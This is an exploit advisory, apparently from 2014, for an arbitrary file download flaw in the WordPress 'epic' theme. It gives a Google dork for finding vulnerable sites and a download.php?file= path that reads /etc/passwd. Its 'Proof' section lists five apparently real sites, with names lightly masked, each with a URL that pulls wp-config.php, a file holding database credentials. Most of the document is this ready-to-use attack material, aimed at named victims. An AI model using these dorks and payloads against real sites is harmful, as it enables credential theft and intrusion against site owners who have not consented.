|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/epic | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.organizedthemes.com/epic | |[*] Tested on: Windows 7 | |-------------------------------------------------------------------------| | |[*] Location : [localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd | |-------------------------------------------------------------------------| |[*] Proof: | |[*] http://www.lagXunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php | |[*] http://doveeXtown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php | |[*] http://verdeXbaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php | |[*] http://kespXres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php | |[*] http://kimberlywilliamsXministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php | |-------------------------------------------------------------------------| |[*] Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|